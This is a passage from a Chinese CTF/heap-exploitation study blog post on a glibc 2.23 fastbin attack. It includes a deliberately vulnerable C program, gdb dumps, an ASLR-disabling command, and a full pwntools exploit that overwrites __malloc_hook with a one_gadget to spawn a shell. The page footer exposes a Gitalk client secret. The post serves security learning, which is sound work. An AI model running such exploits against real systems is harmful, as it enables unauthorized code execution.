<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">gef➤  x&#x2F;20gx 0x7fffffffddd8-0x10</span><br><span class="line">0x7fffffffddc8:	0x000000000040095c	0x0000000000000020</span><br><span class="line">0x7fffffffddd8:	0x0000000000603010	0x0000000000603030</span><br><span class="line">0x7fffffffdde8:	0x0000000000603050	0x0000000000603010</span><br></pre></td></tr></table></figure>


<p>继续申请内存，此时分配掉了链表头的chunk，此时我们写入指向”任意”地址的freechunk终于排到了链表头部。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">3rd malloc(8): 0x189e010, putting the stack address on the free list</span><br><span class="line"></span><br><span class="line">Fastbin[0]  →   FreeChunk(addr&#x3D;0x7fffffffddd8,size&#x3D;0x20)   →   FreeChunk(addr&#x3D;0x603020,size&#x3D;0x0)</span><br></pre></td></tr></table></figure>


<p>继续申请内存，成功malloc了一块内存到任意地址(有条件)，此时如果程序拥有对内存的读写操作，就能完成一次任意地址读写的操作。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">4th malloc(8): 0x7fffffffddd8</span><br></pre></td></tr></table></figure>


<p>纵观全局，这个例子是利用double free，来实现对fd指针的一个修改，实现fastbin_attack任意地址写（本案例的意愿应该是展示将数据写入栈帧）。Double free作为攻击方式可以看作UAF的一个子集，个人觉得这个案例如果是针对fastbin_attack技术，并不是最好的一个案例。因为Double free这个技术真的耀眼到宣兵夺主的地步了，所以下文对其进行修改，使用简单的堆溢出来实现fashbin_attack.</p>
<p>攻击对象比较常见的便是malloc_hook函数（将libc拖入IDA，查看exports即可找到）</p>
<p>利用手法可以参考我之前发在安全客的<a href="https://www.anquanke.com/post/id/176694#h3-5" target="_blank" rel="noopener">文章</a><br>[因为当时对堆不熟，有很多不严谨的地方]</p>
<p><img src="https://gitee.com/p0kerface/blog_image_management/raw/master/uploads/how2heap11550.png" alt=""> </p>
<h2 id="案例分析"><a href="#案例分析" class="headerlink" title="案例分析"></a>案例分析</h2><p>首先关闭ASLR，因为malloc_hook函数在libc中，会受到地址随机化的影响</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"># echo 0 &gt; &#x2F;proc&#x2F;sys&#x2F;kernel&#x2F;randomize_va_space</span><br></pre></td></tr></table></figure>
<p>程序源码:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">#include&lt;stdio.h&gt;</span><br><span class="line"></span><br><span class="line">#include&lt;stdlib.h&gt;</span><br><span class="line"></span><br><span class="line">int main()</span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line"></span><br><span class="line">​	int *a&#x3D;malloc(0x60);</span><br><span class="line">​	int *b&#x3D;malloc(0x60);</span><br><span class="line">​	int *c&#x3D;malloc(0x60);</span><br><span class="line">​	printf(&quot;1st malloc(0x60)-&gt;a, addr&#x3D;%p \n&quot;,a);</span><br><span class="line">​	printf(&quot;2st malloc(0x60)-&gt;b, addr&#x3D;%p \n&quot;,b);</span><br><span class="line">​	printf(&quot;3st malloc(x060)-&gt;c, addr&#x3D;%p \n&quot;,c);</span><br><span class="line">​	free(c);</span><br><span class="line">​	free(b);</span><br><span class="line">​	printf(&quot;free b and c&quot;);</span><br><span class="line"></span><br><span class="line">​	puts(&quot;heap overflow:&quot;);</span><br><span class="line">​	read(0,a,0x200);</span><br><span class="line">​	printf(&quot;a&#x3D;%s&quot;,a);</span><br><span class="line">​	int *d&#x3D;malloc(0x60);</span><br><span class="line">​	int *e&#x3D;malloc(0x60);</span><br><span class="line"></span><br><span class="line">​	puts(&quot;please write:&quot;);</span><br><span class="line">​	read(0,e,0x64);</span><br><span class="line">​	malloc(0x60);</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>




<p>通过查看内存可以找到</p>
<p>Malloc_hook偏移35字节，可以构成fake_chunk(size=0x7f)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">gef➤  x&#x2F;20xg 0x7ffff7dd1b10-35</span><br><span class="line"></span><br><span class="line">0x7ffff7dd1aed &lt;_IO_wide_data_0+301&gt;:	0xfff7dd0260000000	0x000000000000007f  &lt;--fake_chunk</span><br><span class="line">0x7ffff7dd1afd:	0xfff7a92e20000000	0xfff7a92a0000007f</span><br><span class="line">0x7ffff7dd1b0d &lt;__realloc_hook+5&gt;:	0x000000000000007f	0x0000000000000000</span><br><span class="line">0x7ffff7dd1b1d:	0x0100000000000000	0x0000000000000000</span><br></pre></td></tr></table></figure>


<p>通过写入chunk_A，覆盖被Free的Chunk_B，修改其FD指针指向malloc_hook-35的fake_chunk</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">gef➤  heap bin fast</span><br><span class="line"></span><br><span class="line">─────[ Fastbins for arena 0x7ffff7dd1b20 ]────</span><br><span class="line">Fastbin[0] 0x00</span><br><span class="line">...: </span><br><span class="line">Fastbin[5]  →   UsedChunk(addr&#x3D;0x602080,size&#x3D;0x70)   →   UsedChunk(addr&#x3D;0x7ffff7dd1afd,size&#x3D;0x7c)</span><br></pre></td></tr></table></figure>
<p>接下来两次malloc，第二次malloc的时候，$rax被赋值0x00007ffff7dd1afd，就在malloc_hook-35的位置成了我们的内存空间（指针e）。此时向e写入35以上的字符就能malloc_hook的值。</p>
<p>结合我们获取的one_gadget，程序结尾调用malloc就会自动跳转到one_gadget.</p>
<p>PS:如果实战中的利用可以参考我IE漏洞分析UAF的<a href="https://www.anquanke.com/post/id/190590" target="_blank" rel="noopener">文章</a>，使用栈翻转来执行ROP链，利用原理都是通用的，此处不再赘述。</p>
<p>给出完整利用代码[仅限libc.2.23.so]</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line">p&#x3D;process(&quot;.&#x2F;fastbins_attack&quot;)</span><br><span class="line">gdb.attach(p,&quot;b main&quot;)</span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">malloc_hook&#x3D;0x3c4b10</span><br><span class="line">one_gadget&#x3D;0x45216 # execve(&quot;&#x2F;bin&#x2F;sh&quot;, rsp+0x30, environ)</span><br><span class="line">base&#x3D;0x00007ffff7a0d000 #libc-2.23.so</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line">payload1&#x3D;&quot;A&quot;*0x68</span><br><span class="line">payload1+&#x3D;p64(0x71)</span><br><span class="line">payload1+&#x3D;p64(malloc_hook+base-35)</span><br><span class="line"></span><br><span class="line">print &quot;malloc_hook&#x3D;&quot;+str(malloc_hook)</span><br><span class="line">print &quot;[+]sending payload..&quot;</span><br><span class="line">#p.recvuntil(&quot;overflow:&quot;)</span><br><span class="line">p.sendline(payload1)</span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">print &quot;[+]sending payload2..&quot;</span><br><span class="line">payload2&#x3D;&quot;A&quot;*(35-16)+p64(one_gadget+base)</span><br><span class="line">p.recvuntil(&quot;write:&quot;)</span><br><span class="line">p.sendline(payload2)</span><br><span class="line"> </span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>


<p>覆盖malloc_hook为one_gadget地址</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">gef➤  x&#x2F;10gx 0x7ffff7dd1b10</span><br><span class="line">0x7ffff7dd1b10 &lt;__malloc_hook&gt;:	0x00007ffff7a52216	0x000000000000000a</span><br></pre></td></tr></table></figure>
<p>继续运行便返回一个shell</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">gef➤  n</span><br><span class="line">process 66236 is executing new program: &#x2F;bin&#x2F;dash</span><br></pre></td></tr></table></figure>





<h1 id="参考文献"><a href="#参考文献" class="headerlink" title="参考文献:"></a>参考文献:</h1><p>[1]fastbin attack漏洞之__malloc_hook攻击</p>
<p><a href="https://blog.csdn.net/qq_41453285/article/details/99321101" target="_blank" rel="noopener">https://blog.csdn.net/qq_41453285/article/details/99321101</a></p>
<p>[2]银河实验室.浅析Linux堆溢出之fastbin,<a href="https://www.freebuf.com/news/88660.html" target="_blank" rel="noopener">https://www.freebuf.com/news/88660.html</a></p>
<p>[3]华庭(庄明强).《glibc内存管理ptmalloc2源代码分析》2011-4-17</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://yoursite.com/2019/11/22/how2heap1/" data-id="ck4pciqo0001ovx2s6m7ie6e0"
         class="article-share-link">Share</a>
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/CTF/" rel="tag">CTF</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/HEAP/" rel="tag">HEAP</a></li></ul>

    </footer>

  </div>

  
    
  <nav class="article-nav">
    
      <a href="/2019/11/25/how2heap2/" class="article-nav-link">
        <strong class="article-nav-caption">Newer posts</strong>
        <div class="article-nav-title">
          
            How2Heap堆利用学习笔记(二)consolidate
          
        </div>
      </a>
    
    
      <a href="/2019/11/20/2019-11-20/" class="article-nav-link">
        <strong class="article-nav-caption">Olde posts</strong>
        <div class="article-nav-title">二零一九 十一月 二十日 凌晨</div>
      </a>
    
  </nav>


  

  
    
  <div class="gitalk" id="gitalk-container"></div>
  
<link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">

  
<script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>

  
<script src="https://cdn.bootcss.com/blueimp-md5/2.10.0/js/md5.min.js"></script>

  <script type="text/javascript">
    var gitalk = new Gitalk({
      clientID: '5ae4e05700db25ed5406',
      clientSecret: '8a38a8cb845b0b6198a0c59cab9df498ac778343',
      repo: 'migraine-sudo.github.io',
      owner: 'migraine-sudo',
      admin: ['migraine-sudo'],
      // id: location.pathname,      // Ensure uniqueness and length less than 50
      id: md5(location.pathname),
      distractionFreeMode: false,  // Facebook-like distraction free mode
      pagerDirection: 'last'
    })

  gitalk.render('gitalk-container')
  </script>

  

</article>



</section>
  <footer class="footer">
  <div class="outer">
    <div class="float-right">
      <ul class="list-inline">
  
    <li><i class="fe fe-smile-alt"></i> <span id="busuanzi_value_site_uv"></span></li>
  
</ul>
    </div>
    <ul class="list-inline">
      <li>&copy; 2019 Migraine</li>
      <li>Powered by <a href="http://hexo.io/" target="_blank">Hexo</a></li>
      <li>Theme  <a href="https://github.com/zhwangart/hexo-theme-ocean" target="_blank" rel="noopener">Ocean</a></li>
    </ul>
  </div>
</footer>

</main>

<aside class="sidebar sidebar-specter">
  
    <button class="navbar-toggle"></button>
<nav class="navbar">
  
    <div class="logo">
      <a href="/"><img src="/images/fujiang.jpg" alt="Migraine"></a>
    </div>
  
  <ul class="nav nav-main">
    
      <li class="nav-item">
        <a class="nav-item-link" href="/">Home</a>
      </li>
    
      <li class="nav-item">
        <a class="nav-item-link" href="/archives">Archives</a>
      </li>
    
      <li class="nav-item">
        <a class="nav-item-link" href="/gallery">Gallery</a>
      </li>
    
      <li class="nav-item">
        <a class="nav-item-link" href="/about">About</a>
      </li>
    
      <li class="nav-item">
        <a class="nav-item-link" href="/tags">Tags</a>
      </li>
    
    <li class="nav-item">
      <a class="nav-item-link nav-item-search" title="Search">
        <i class="fe fe-search"></i>
        Search
      </a>
    </li>
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      <div class="totop" id="totop">
  <i class="fe fe-rocket"></i>
</div>
    </li>
    <li class="nav-item">
      
        <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
          <i class="fe fe-feed"></i>
        </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
  </aside>
  
<script src="/js/jquery-2.0.3.min.js"></script>


<script src="/js/jquery.justifiedGallery.min.js"></script>


<script src="/js/lazyload.min.js"></script>


<script src="/js/busuanzi-2.3.pure.min.js"></script>


  
<script src="/fancybox/jquery.fancybox.min.js"></script>




  
<script src="/js/tocbot.min.js"></script>

  <script>
    // Tocbot_v4.7.0  http://tscanlin.github.io/tocbot/
    tocbot.init({
      tocSelector: '.tocbot',
      contentSelector: '.article-entry',
      headingSelector: 'h1, h2, h3, h4, h5, h6',
      hasInnerContainers: true,
      scrollSmooth: true,
      positionFixedSelector: '.tocbot',
      positionFixedClass: 'is-position-fixed',
      fixedSidebarOffset: 'auto',
    });
  </script>



<script src="/js/ocean.js"></script>


</body>
</html>